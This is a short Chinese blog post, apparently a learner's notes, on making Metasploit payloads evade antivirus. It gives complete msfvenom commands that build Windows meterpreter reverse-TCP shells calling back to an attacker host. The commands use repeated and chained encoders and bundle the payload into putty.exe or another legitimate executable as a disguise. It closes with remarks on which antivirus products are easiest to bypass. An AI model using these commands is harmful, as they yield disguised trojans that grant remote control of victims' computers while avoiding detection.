免杀马学习(MSF捆绑编码)

2023年将会持续于B站、优快云等各大平台更新,可加入粉丝群与博主交流:838681355,为了老板大G共同努力。

前言

仅供学习,入行前的笔记,关于免杀效果请勿喷

用法

针对windows
使用x86/shikata_ga_nai生成payload,参数-i为编码次数,我这里设置15次,并使用了-b参数去掉payload中的空字符。

多重编码:
Payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<kali ip> LPORT=3333 -e x86/shikata_ga_nai -b "\x00" -i 15  -f exe -o shell.exe
捆绑免杀:
Payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333  -x putty.exe  -f exe -o payload3.exe
MSF捆绑编码法:
Payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<kali ip> LPORT=3333 -e x86/shikata_ga_nai -x <正规文件exe> -i 15 -f exe -o shell.exe
其他payload:
msfvenom  -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=10.211.55.2 LPORT=3333 -f raw | msfvenom -e x86/alpha_upper -i 10 -f raw | msfvenom -e x86/countdown -i 10 -x putty.exe -f exe -o payload5.exe

免杀情况

在这里插入图片描述
在这里插入图片描述

杀软情况

在这里插入图片描述

总结

一开始学习的时候,过静态还是比较容易,但是如果要过动态还需要对进程进行分析,杀软过火绒还是比较简单的,360的动态分析比较强,总结出360和Defender是比较难饶的。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cllmsy_K

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值